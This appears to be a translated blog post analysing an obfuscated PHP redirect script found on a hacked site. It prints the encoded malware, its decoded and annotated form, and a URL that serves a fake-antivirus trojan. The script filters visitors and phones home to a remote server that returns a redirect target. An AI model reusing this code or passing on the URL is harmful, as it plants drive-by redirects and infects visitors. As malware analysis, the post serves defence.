$GLOBALS['_664181862_'][0](_724562126(0),_724562126(1));$_0=isset($_SERVER[_724562126(2)])?$GLOBALS['_664181862_'][1]($_SERVER[_724562126(3)]):_724562126(4);(round(0+3419)-round(0+1139.6666666667+1139.6666666667+1139.6666666667)+round(0+3826)-round(0+1275.3333333333+1275.3333333333+1275.3333333333))?$GLOBALS['_664181862_'][2]($_1,$_2):$GLOBALS['_664181862_'][3](round(0+854.75+854.75+854.75+854.75),round(0+1938+1938));if($GLOBALS['_664181862_'][4]($_0,_724562126(5))===false){exit(_724562126(6));}$_3=array(_724562126(7),_724562126(8),_724562126(9),_724562126(10),_724562126(11),);$_4=false;foreach($_3 as $_5){if($GLOBALS['_664181862_'][5]($_0,$_5)!==false){$_4=true;break;}}if(!$_4){exit(_724562126(12));}$_6=isset($_SERVER[_724562126(13)])?$_SERVER[_724562126(14)]:_724562126(15);if(empty($_6)){exit(_724562126(16));}$_SERVER[_724562126(17)]=$GLOBALS['_664181862_'][6]($_SERVER[_724562126(18)]);$_SERVER[_724562126(19)]=$GLOBALS['_664181862_'][7](_724562126(20),_724562126(21),$_SERVER[_724562126(22)]);$_7=_724562126(23) .$GLOBALS['_664181862_'][8]($_SERVER[_724562126(24)]) ._724562126(25) .$GLOBALS['_664181862_'][9]($_SERVER[_724562126(26)] ._724562126(27) .$_6);;$_8=l__0($_7);if($_8==_724562126(28)){exit(_724562126(29));}$GLOBALS['_664181862_'][10](_724562126(30) .$GLOBALS['_664181862_'][11]($_8));function l__0($_9){if($GLOBALS['_664181862_'][12](_724562126(31))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){return l__1($_9);}else{$_10=$GLOBALS['_664181862_'][13](ADMIN_REDIR_URL);if($_11=@$GLOBALS['_664181862_'][14]($_10[_724562126(32)],round(0+80),$_12,$_13,round(0+3.75+3.75+3.75+3.75))){return l__2($_11,$_10[_724562126(33)],$_10[_724562126(34)],$_9);}elseif(@$GLOBALS['_664181862_'][15](_724562126(35))){return l__3($_9);}}}function l__1($_7){$_14=$GLOBALS['_664181862_'][16](array(_724562126(36)=> array(_724562126(37)=> _724562126(38),_724562126(39)=> _724562126(40) ._724562126(41),_724562126(42)=> $_7,),));if((round(0+767.6+767.6+767.6+767.6+767.6)^round(0+1279.3333333333+1279.3333333333+1279.3333333333))&& $GLOBALS['_664181862_'][17]($_4,$_15,$_5))$GLOBALS['_664181862_'][18]($_16);return $GLOBALS['_664181862_'][19](ADMIN_REDIR_URL,false,$_14);$_17=_724562126(43);}function l__2($_11,$_18,$_19,$_7){$GLOBALS['_664181862_'][20]($_11,_724562126(44) .$_19 ._724562126(45) ."Host: $_18\r\n" ._724562126(46) ._724562126(47) ._724562126(48) ._724562126(49) ._724562126(50) .$GLOBALS['_664181862_'][21]($_7) ._724562126(51) ."Content-Type: application/x-www-form-urlencoded\r\n\r\n$_7");$_2=_724562126(52);if(round(0+1000.25+1000.25+1000.25+1000.25)<$GLOBALS['_664181862_'][22](round(0+537+537+537),round(0+596.25+596.25+596.25+596.25)))$GLOBALS['_664181862_'][23]($_20,$_19,$_13);while($_15=$GLOBALS['_664181862_'][24]($_11,round(0+4096))){$_2 .= $_15;}$GLOBALS['_664181862_'][25]($_11);$_21=round(0+572+572);$_20=$GLOBALS['_664181862_'][26]($_2,_724562126(53));if(round(0+2240+2240)<$GLOBALS['_664181862_'][27](round(0+359.75+359.75+359.75+359.75),round(0+759+759+759+759)))$GLOBALS['_664181862_'][28]($_14,$_20);$_2=$GLOBALS['_664181862_'][29]($_2,$_20+round(0+0.8+0.8+0.8+0.8+0.8));$_22=round(0+500.8+500.8+500.8+500.8+500.8);return $_2;}function l__3($_7){$_1=$GLOBALS['_664181862_'][30](ADMIN_REDIR_URL);(round(0+149+149+149)-round(0+447)+round(0+215)-round(0+71.666666666667+71.666666666667+71.666666666667))?$GLOBALS['_664181862_'][31]($_4,$_15,$_18):$GLOBALS['_664181862_'][32](round(0+89.4+89.4+89.4+89.4+89.4),round(0+3183));$GLOBALS['_664181862_'][33]($_1,42,FALSE);$_23=_724562126(54);$GLOBALS['_664181862_'][34]($_1,19913,TRUE);if((round(0+2508)+round(0+2036.5+2036.5))>round(0+2508)|| $GLOBALS['_664181862_'][35]($_20));else{$GLOBALS['_664181862_'][36]($_15,$_7,$_12);}$GLOBALS['_664181862_'][37]($_1,13,round(0+3.75+3.75+3.75+3.75));$_24=_724562126(55);$GLOBALS['_664181862_'][38]($_1,10015,$_7);if((round(0+440+440+440+440)+round(0+200.25+200.25+200.25+200.25))>round(0+586.66666666667+586.66666666667+586.66666666667)|| $GLOBALS['_664181862_'][39]($_11,$_3,$_15));else{$GLOBALS['_664181862_'][40]($_13,$_1);}$_16=$GLOBALS['_664181862_'][41]($_1);$GLOBALS['_664181862_'][42]($_1);$_25=round(0+1576.6666666667+1576.6666666667+1576.6666666667);return $_16;}

Of course - the file is in one line, the content is encoded
Add hyphens:
the contents of the second file
 <? $GLOBALS['_664181862_']=Array( base64_decode('ZGVmaW5l'), base64_decode('c3RydG9sb3dlcg=='), base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'), base64_decode('bXRfcmFuZA=='), base64_decode('c3RycG9z'), base64_decode('c3RycG9z'), base64_decode('c3RydG9sb3dlcg=='), base64_decode('c3RyX3JlcGxhY2U='), base64_decode('dXJsZW5jb2Rl'), base64_decode('dXJsZW5jb2Rl'), base64_decode('aGVhZGVy'), base64_decode('dHJpbQ=='), base64_decode('aW5pX2dldA=='), base64_decode('cGFyc2VfdXJs'), base64_decode('ZnNvY2tvcGVu'), base64_decode('ZnVuY3Rpb25fZXhpc3Rz'), base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'), base64_decode('YXJyYXlfcmVkdWNl'), base64_decode('ZmZsdXNo'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('ZnB1dHM='), base64_decode('c3RybGVu'), base64_decode('bXRfcmFuZA=='), base64_decode('YXJyYXlfZmlsbA=='), base64_decode('ZnJlYWQ='), base64_decode('ZmNsb3Nl'), base64_decode('c3RycG9z'), base64_decode('bXRfcmFuZA=='), base64_decode('YXJyYXlfZmxpcA=='), base64_decode('c3Vic3Ry'), base64_decode('Y3VybF9pbml0'), base64_decode('c3Vic3Ry'), base64_decode('bXRfcmFuZA=='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('cHJlZ19yZXBsYWNl'), base64_decode('ZnJlYWQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('c3RydmFs'), base64_decode('YXJyYXlfbWVyZ2U='), base64_decode('Y3VybF9leGVj'), base64_decode('Y3VybF9jbG9zZQ==')); ?><? function _724562126($i){ $a=Array( 'QURNSU5fUkVESVJfVVJM', 'aHR0cDovL3Rlc3QuY3VzdG9tc2V4Y2Ftcy5jb20vcmIvZ2V0X3VybC5waHA=', 'SFRUUF9VU0VSX0FHRU5U', 'SFRUUF9VU0VSX0FHRU5U', '', 'd2luZG93cw==', 'MXo=', 'b3BlcmEvOS44MA==', 'bXNpZSAxMA==', 'bXNpZSA5', 'bXNpZSA4', 'bXNpZSA3', 'Mno=', 'SFRUUF9SRUZFUkVS', 'SFRUUF9SRUZFUkVS', '', 'M3o=', 'SFRUUF9IT1NU', 'SFRUUF9IT1NU', 'SFRUUF9IT1NU', 'd3d3Lg==', '', 'SFRUUF9IT1NU', 'ZD0=', 'SFRUUF9IT1NU', 'Og==', 'UkVNT1RFX0FERFI=', 'Og==', 'QkFE', 'NHo=', 'TG9jYXRpb246IA==', 'YWxsb3dfdXJsX2ZvcGVu', 'aG9zdA==', 'aG9zdA==', 'cGF0aA==', 'Y3VybF9pbml0', 'aHR0cA==', 'bWV0aG9k', 'UE9TVA==', 'aGVhZGVy', 'Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=', 'Cg==', 'Y29udGVudA==', 'Yms=', 'UE9TVCA=', 'ICBIVFRQLzEuMA0K', 'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=', 'QWNjZXB0OiAqLyoNCg==', 'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K', 'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K', 'Q29udGVudC1MZW5ndGg6IA==', 'DQo=', '', 'DQoNCg==', 'bQ==', 'am1wcA=='); return base64_decode($a[$i]); } ?><?php $GLOBALS['_664181862_'][0](_724562126(0),_724562126(1)); $_0=isset($_SERVER[_724562126(2)])?$GLOBALS['_664181862_'][1]($_SERVER[_724562126(3)]):_724562126(4); (round(0+3419)-round(0+1139.6666666667+1139.6666666667+1139.6666666667)+round(0+3826)-round(0+1275.3333333333+1275.3333333333+1275.3333333333))?$GLOBALS['_664181862_'][2]($_1,$_2):$GLOBALS['_664181862_'][3](round(0+854.75+854.75+854.75+854.75),round(0+1938+1938)); if($GLOBALS['_664181862_'][4]($_0,_724562126(5))===false){ exit(_724562126(6)); } $_3=array(_724562126(7),_724562126(8),_724562126(9),_724562126(10),_724562126(11),); $_4=false; foreach($_3 as $_5){ if($GLOBALS['_664181862_'][5]($_0,$_5)!==false){ $_4=true; break; } } if(!$_4){ exit(_724562126(12)); } $_6=isset($_SERVER[_724562126(13)])?$_SERVER[_724562126(14)]:_724562126(15); if(empty($_6)){ exit(_724562126(16)); } $_SERVER[_724562126(17)]=$GLOBALS['_664181862_'][6]($_SERVER[_724562126(18)]); $_SERVER[_724562126(19)]=$GLOBALS['_664181862_'][7](_724562126(20),_724562126(21),$_SERVER[_724562126(22)]); $_7=_724562126(23) .$GLOBALS['_664181862_'][8]($_SERVER[_724562126(24)]) ._724562126(25) .$GLOBALS['_664181862_'][9]($_SERVER[_724562126(26)] ._724562126(27) .$_6);; $_8=l__0($_7); if($_8==_724562126(28)){ exit(_724562126(29)); } $GLOBALS['_664181862_'][10](_724562126(30) .$GLOBALS['_664181862_'][11]($_8)); function l__0($_9){ if($GLOBALS['_664181862_'][12](_724562126(31))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){ return l__1($_9); }else{ $_10=$GLOBALS['_664181862_'][13](ADMIN_REDIR_URL); if($_11=@$GLOBALS['_664181862_'][14]($_10[_724562126(32)],round(0+80),$_12,$_13,round(0+3.75+3.75+3.75+3.75))){ return l__2($_11,$_10[_724562126(33)],$_10[_724562126(34)],$_9); }elseif(@$GLOBALS['_664181862_'][15](_724562126(35))){ return l__3($_9); } } } function l__1($_7){ $_14=$GLOBALS['_664181862_'][16](array(_724562126(36)=> array(_724562126(37)=> _724562126(38),_724562126(39)=> _724562126(40) ._724562126(41),_724562126(42)=> $_7,),)); if((round(0+767.6+767.6+767.6+767.6+767.6)^round(0+1279.3333333333+1279.3333333333+1279.3333333333))&& $GLOBALS['_664181862_'][17]($_4,$_15,$_5))$GLOBALS['_664181862_'][18]($_16); return $GLOBALS['_664181862_'][19](ADMIN_REDIR_URL,false,$_14); $_17=_724562126(43); } function l__2($_11,$_18,$_19,$_7){ $GLOBALS['_664181862_'][20]($_11,_724562126(44) .$_19 ._724562126(45) ."Host: $_18\r\n" ._724562126(46) ._724562126(47) ._724562126(48) ._724562126(49) ._724562126(50) .$GLOBALS['_664181862_'][21]($_7) ._724562126(51) ."Content-Type: application/x-www-form-urlencoded\r\n\r\n$_7"); $_2=_724562126(52); if(round(0+1000.25+1000.25+1000.25+1000.25)<$GLOBALS['_664181862_'][22](round(0+537+537+537),round(0+596.25+596.25+596.25+596.25)))$GLOBALS['_664181862_'][23]($_20,$_19,$_13); while($_15=$GLOBALS['_664181862_'][24]($_11,round(0+4096))){ $_2 .= $_15; } $GLOBALS['_664181862_'][25]($_11); $_21=round(0+572+572); $_20=$GLOBALS['_664181862_'][26]($_2,_724562126(53)); if(round(0+2240+2240)<$GLOBALS['_664181862_'][27](round(0+359.75+359.75+359.75+359.75),round(0+759+759+759+759)))$GLOBALS['_664181862_'][28]($_14,$_20); $_2=$GLOBALS['_664181862_'][29]($_2,$_20+round(0+0.8+0.8+0.8+0.8+0.8)); $_22=round(0+500.8+500.8+500.8+500.8+500.8); return $_2; } function l__3($_7){ $_1=$GLOBALS['_664181862_'][30](ADMIN_REDIR_URL); (round(0+149+149+149)-round(0+447)+round(0+215)-round(0+71.666666666667+71.666666666667+71.666666666667))?$GLOBALS['_664181862_'][31]($_4,$_15,$_18):$GLOBALS['_664181862_'][32](round(0+89.4+89.4+89.4+89.4+89.4),round(0+3183)); $GLOBALS['_664181862_'][33]($_1,42,FALSE); $_23=_724562126(54); $GLOBALS['_664181862_'][34]($_1,19913,TRUE); if((round(0+2508)+round(0+2036.5+2036.5))>round(0+2508)|| $GLOBALS['_664181862_'][35]($_20)); else{ $GLOBALS['_664181862_'][36]($_15,$_7,$_12); } $GLOBALS['_664181862_'][37]($_1,13,round(0+3.75+3.75+3.75+3.75)); $_24=_724562126(55); $GLOBALS['_664181862_'][38]($_1,10015,$_7); if((round(0+440+440+440+440)+round(0+200.25+200.25+200.25+200.25))>round(0+586.66666666667+586.66666666667+586.66666666667)|| $GLOBALS['_664181862_'][39]($_11,$_3,$_15)); else{ $GLOBALS['_664181862_'][40]($_13,$_1); } $_16=$GLOBALS['_664181862_'][41]($_1); $GLOBALS['_664181862_'][42]($_1); $_25=round(0+1576.6666666667+1576.6666666667+1576.6666666667); return $_16; } ?>

Decrypt the code:
the contents of the second file
 <? $GLOBALS['_664181862_']=Array( // [0] => define // [1] => strtolower // [2] => imagecreatefromgif // [3] => mt_rand // [4] => strpos // [5] => strpos // [6] => strtolower // [7] => str_replace // [8] => urlencode // [9] => urlencode // [10] => header // [11] => trim // [12] => ini_get // [13] => parse_url // [14] => fsockopen // [15] => function_exists // [16] => stream_context_create // [17] => array_reduce // [18] => fflush // [19] => file_get_contents // [20] => fputs // [21] => strlen // [22] => mt_rand // [23] => array_fill // [24] => fread // [25] => fclose // [26] => strpos // [27] => mt_rand // [28] => array_flip // [29] => substr // [30] => curl_init // [31] => substr // [32] => mt_rand // [33] => curl_setopt // [34] => curl_setopt // [35] => preg_replace // [36] => fread // [37] => curl_setopt // [38] => curl_setopt // [39] => strval // [40] => array_merge // [41] => curl_exec // [42] => curl_close base64_decode('ZGVmaW5l'), base64_decode('c3RydG9sb3dlcg=='), base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'), base64_decode('bXRfcmFuZA=='), base64_decode('c3RycG9z'), base64_decode('c3RycG9z'), base64_decode('c3RydG9sb3dlcg=='), base64_decode('c3RyX3JlcGxhY2U='), base64_decode('dXJsZW5jb2Rl'), base64_decode('dXJsZW5jb2Rl'), base64_decode('aGVhZGVy'), base64_decode('dHJpbQ=='), base64_decode('aW5pX2dldA=='), base64_decode('cGFyc2VfdXJs'), base64_decode('ZnNvY2tvcGVu'), base64_decode('ZnVuY3Rpb25fZXhpc3Rz'), base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'), base64_decode('YXJyYXlfcmVkdWNl'), base64_decode('ZmZsdXNo'), base64_decode('ZmlsZV9nZXRfY29udGVudHM='), base64_decode('ZnB1dHM='), base64_decode('c3RybGVu'), base64_decode('bXRfcmFuZA=='), base64_decode('YXJyYXlfZmlsbA=='), base64_decode('ZnJlYWQ='), base64_decode('ZmNsb3Nl'), base64_decode('c3RycG9z'), base64_decode('bXRfcmFuZA=='), base64_decode('YXJyYXlfZmxpcA=='), base64_decode('c3Vic3Ry'), base64_decode('Y3VybF9pbml0'), base64_decode('c3Vic3Ry'), base64_decode('bXRfcmFuZA=='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('cHJlZ19yZXBsYWNl'), base64_decode('ZnJlYWQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('Y3VybF9zZXRvcHQ='), base64_decode('c3RydmFs'), base64_decode('YXJyYXlfbWVyZ2U='), base64_decode('Y3VybF9leGVj'), base64_decode('Y3VybF9jbG9zZQ==')); ?><? function _724562126($i){ // [0] => ADMIN_REDIR_URL // [1] => http://test.customsexcams.com/rb/get_url.php // [2] => HTTP_USER_AGENT // [3] => HTTP_USER_AGENT // [4] => // [5] => windows // [6] => 1z // [7] => opera/9.80 // [8] => msie 10 // [9] => msie 9 // [10] => msie 8 // [11] => msie 7 // [12] => 2z // [13] => HTTP_REFERER // [14] => HTTP_REFERER // [15] => // [16] => 3z // [17] => HTTP_HOST // [18] => HTTP_HOST // [19] => HTTP_HOST // [20] => www. // [21] => // [22] => HTTP_HOST // [23] => d= // [24] => HTTP_HOST // [25] => : // [26] => REMOTE_ADDR // [27] => : // [28] => BAD // [29] => 4z // [30] => Location: // [31] => allow_url_fopen // [32] => host // [33] => host // [34] => path // [35] => curl_init // [36] => http // [37] => method // [38] => POST // [39] => header // [40] => Content-Type: application/x-www-form-urlencoded // [41] => // [42] => content // [43] => bk // [44] => POST // [45] => HTTP/1.0 // [46] => User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 // [47] => Accept: */* // [48] => Accept-Language: en-us,en;q=0.5 // [49] => Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 // [50] => Content-Length: // [51] => // [52] => // [53] => // [54] => m // [55] => jmpp $a=Array( 'QURNSU5fUkVESVJfVVJM', 'aHR0cDovL3Rlc3QuY3VzdG9tc2V4Y2Ftcy5jb20vcmIvZ2V0X3VybC5waHA=', 'SFRUUF9VU0VSX0FHRU5U', 'SFRUUF9VU0VSX0FHRU5U', '', 'd2luZG93cw==', 'MXo=', 'b3BlcmEvOS44MA==', 'bXNpZSAxMA==', 'bXNpZSA5', 'bXNpZSA4', 'bXNpZSA3', 'Mno=', 'SFRUUF9SRUZFUkVS', 'SFRUUF9SRUZFUkVS', '', 'M3o=', 'SFRUUF9IT1NU', 'SFRUUF9IT1NU', 'SFRUUF9IT1NU', 'd3d3Lg==', '', 'SFRUUF9IT1NU', 'ZD0=', 'SFRUUF9IT1NU', 'Og==', 'UkVNT1RFX0FERFI=', 'Og==', 'QkFE', 'NHo=', 'TG9jYXRpb246IA==', 'YWxsb3dfdXJsX2ZvcGVu', 'aG9zdA==', 'aG9zdA==', 'cGF0aA==', 'Y3VybF9pbml0', 'aHR0cA==', 'bWV0aG9k', 'UE9TVA==', 'aGVhZGVy', 'Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=', 'Cg==', 'Y29udGVudA==', 'Yms=', 'UE9TVCA=', 'ICBIVFRQLzEuMA0K', 'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=', 'QWNjZXB0OiAqLyoNCg==', 'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K', 'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K', 'Q29udGVudC1MZW5ndGg6IA==', 'DQo=', '', 'DQoNCg==', 'bQ==', 'am1wcA=='); return base64_decode($a[$i]); } ?><?php define(ADMIN_REDIR_URL,"http://test.customsexcams.com/rb/get_url.php"); if (isset($_SERVER[HTTP_USER_AGENT])) { $_0 = strtolower($_SERVER[HTTP_USER_AGENT]); } else { $_0 = ""; } if(0){ imagecreatefromgif($_1,$_2); } else { mt_rand(3419,3876); } if (strpos($_0,"windows")===false){ exit("1z"); } $_3=Array("opera/9.80", "msie 10", "msie 9", "msie 8", "msie 7",); $_4=false; foreach($_3 as $_5){ if (strpos($_0,$_5)!==false){ $_4=true; break; } } if(!$_4){ exit("2z"); } if (isset($_SERVER[HTTP_REFERER])){ $_6 = $_SERVER[HTTP_REFERER]); } else { $_6 = ""; } if(empty($_6)){ exit("3z"); } $_SERVER[HTTP_HOST]=strtolower($_SERVER[HTTP_HOST]); $_SERVER[HTTP_HOST]=str_replace("www.", "",$_SERVER[HTTP_HOST]); $_7="d=urlencode($_SERVER[HTTP_HOST]):urlencode($_SERVER[REMOTE_ADDR]:$_6);"; $_8=l__0($_7); if ($_8="BAD"){ exit("4z"); } header("Location: ".trim($_8)); function l__0($_9){ if (ini_get(allow_url_fopen)==1){ return l__1($_9); } else { $_10 = parse_url(ADMIN_REDIR_URL); if ($_11=@fsockopen($_10[host], 80, $_12, $_13, 15){ return l__2($_11,$_10[host],$_10[path],$_9); } elseif (@function_exists(curl_init)){ return l__3($_9); } } } function l__1($_7){ $_14=stream_context_create(array(http=>array(method=>POST, header=>"Content-Type: application/x-www-form-urlencoded ",content=>$_7,),)); if (0 && array_reduce($_4, $_15, $_5)){ //-  fflush($_16); } return file_get_contents(ADMIN_REDIR_URL,false,$_14); $_17 = "bk"; // } function l__2($_11,$_18,$_19,$_7){ fputs($_11, "POST ".$_19." HTTP/1.0\r\n Host: $_18\r\n User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n Accept: */*\r\n Accept-Language: en-us,en;q=0.5\r\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n Content-Length: ".strlen($_7)."\r\n Content-Type: application/x-www-form-urlencoded\r\n\r\n$_7"); $_2=""; if (4001<mt_rand(1611,2385)) { //  array_fill($_20,$_19,$_13); } while ($_15=fread($_11, 4096)){ $_2 .= $_15; } fclose($_11); $_21 = 1144; //  $_20 = strpos($_2, ""); if (4480<mt_rand(1439,3036)){ //  array_flip($_14, $_20); } $_2=substr($_2, $_20+4); $_22 = 2504; //  return $_2; } function l__3($_7){ $_1 = curl_init(ADMIN_REDIR_URL); if (0){ //  substr($_4, $_15, $_18); } else { mt_rand(447, 3183); } curl_setopt($_1, 42, FALSE); $_23 = m; //  curl_setopt($_1,19913,TRUE); if (6581>2508 || preg_replace($_20)); // else{ fread($_15,$_7,$_12); } curl_setopt($_1,13,15); $_24 = jmpp; // curl_setopt($_1,10015,$_7); if (2561>1760 || strval($_11,$_3,$_15)); //  else { array_merge($_13,$_1); } $_16=curl_exec($_1); curl_close($_1); $_25=4730; // return $_16; } ?>

We delete too much:

 <?php define(ADMIN_REDIR_URL,"http://test.customsexcams.com/rb/get_url.php"); if (isset($_SERVER[HTTP_USER_AGENT])) { //   - $_0 = strtolower($_SERVER[HTTP_USER_AGENT]); } else { $_0 = ""; } if (strpos($_0,"windows")===false){ //  - ,       "windows",    1z.  . exit("1z"); } $_3=Array("opera/9.80", "msie 10", "msie 9", "msie 8", "msie 7",); $_4=false; foreach($_3 as $_5){ if (strpos($_0,$_5)!==false){ //   -  Opera   $_4=true; break; } } if(!$_4){ exit("2z"); //   -    2z.  . } if (isset($_SERVER[HTTP_REFERER])){ //    $_6 = $_SERVER[HTTP_REFERER]; } else { $_6 = ""; } if(empty($_6)){ //    -    3z.  . exit("3z"); } $_SERVER[HTTP_HOST]=strtolower($_SERVER[HTTP_HOST]); $_SERVER[HTTP_HOST]=str_replace("www.", "",$_SERVER[HTTP_HOST]); // $_7="d=urlencode($_SERVER[HTTP_HOST]):urlencode($_SERVER[REMOTE_ADDR]:$_6);"; //   d=_:_: $_8=l__0($_7); if ($_8="BAD"){ //     "BAD" -    4z.  . exit("4z"); } header("Location: ".trim($_8)); //   ,     function l__0($paramurl){ //       if (ini_get(allow_url_fopen)==1){ return l__1($paramurl); } else { $_10 = parse_url(ADMIN_REDIR_URL); if ($_11=@fsockopen($_10[host], 80, $_12, $_13, 15){ return l__2($_11,$_10[host],$_10[path],$paramurl); } elseif (@function_exists(curl_init)){ return l__3($paramurl); } } } function l__1($paramurl){ //       file_get_contents $_14=stream_context_create(array( http=>array( method=>POST, header=>"Content-Type: application/x-www-form-urlencoded ", content=>$paramurl, ), ) ); return file_get_contents(ADMIN_REDIR_URL,false,$_14); } function l__2($socket, $host, $path, $paramurl){ //       fsockopen fputs($socket, "POST ".$path." HTTP/1.0\r\n Host: $host\r\n User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n Accept: */*\r\n Accept-Language: en-us,en;q=0.5\r\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n Content-Length: ".strlen($paramurl)."\r\n Content-Type: application/x-www-form-urlencoded\r\n\r\n$paramurl"); $response=""; while ($buffer=fread($socket, 4096)){ $response .= $buffer; } fclose($socket); $header_end = strpos($response, ""); $response=substr($response, $header_end+4); return $response; } function l__3($paramurl){ //       curl $curl = curl_init(ADMIN_REDIR_URL); curl_setopt($curl, 42, FALSE); curl_setopt($curl,19913,TRUE); curl_setopt($curl,13,15); curl_setopt($curl,10015,$paramurl); $response=curl_exec($curl); curl_close($curl); return $response; } ?>


The essence of the script is an appeal to the address test.customsexcams.com/rb/get_url.php with a certain parameter (of the type d = SITE_Address: CLIENT_Address: REFERAL).

Quickly, after copying one of the functions, I ran my script to go to the next step:
 $purl="d=weddingcatering.co.th:80.112.243.203%3AEach_will_be_rewarded_according_to_merit"; $_14=stream_context_create(array( http=>array( method=>POST, header=>"Content-Type: application/x-www-form-urlencoded ", content=>$purl, ), ) ); $resp = file_get_contents(ADMIN_REDIR_URL,false,$_14); echo $resp;

And he received a concise reply: BAD .
And then it occurred to me with the address of the site to use not any of my list, but the one that is now in the code of the 7.txt file. The answer was different:
Hidden text
Attention!!!
By clicking on the link below, you risk infecting your computer with a trojan!

http: //blog2.companyscoming.co: 3811 / books / site-map.php? radio = 888 & themes = 883 & login = 82 & advocacy = 833 & browser = 79

Parameters after the "?" generated randomly and do not matter.
Since I use Google Chrome browser, when I went to this page, I saw a 502 error. But it was enough to launch the Opera browser, as I was immediately offered to run a certain Java application, which Kaspersky Anti-Virus identified as Trojan / Win32.badur.a. This malware closes all open programs (and those that you try to open - immediately closes) and launches itself - a certain computer scanner for viruses, which immediately finds a bouquet of any infection on your computer and strongly suggests activating it for $ 60 a year (90 $ for 3 years!). It kills infection by deleting the tdefender.exe file (defender.exe) in the% AppData% RandomName% directory (in my case, AppData \ Roaming) and clearing the registry key in the branches responsible for autorun (Run).

At this my investigation came to an end.

Total.

The scheme is as follows:


Afterword.

No one is insured against hacking the site, so do not forget about the simple precautions:

Source: https://habr.com/ru/post/184150/

More articles:


All Articles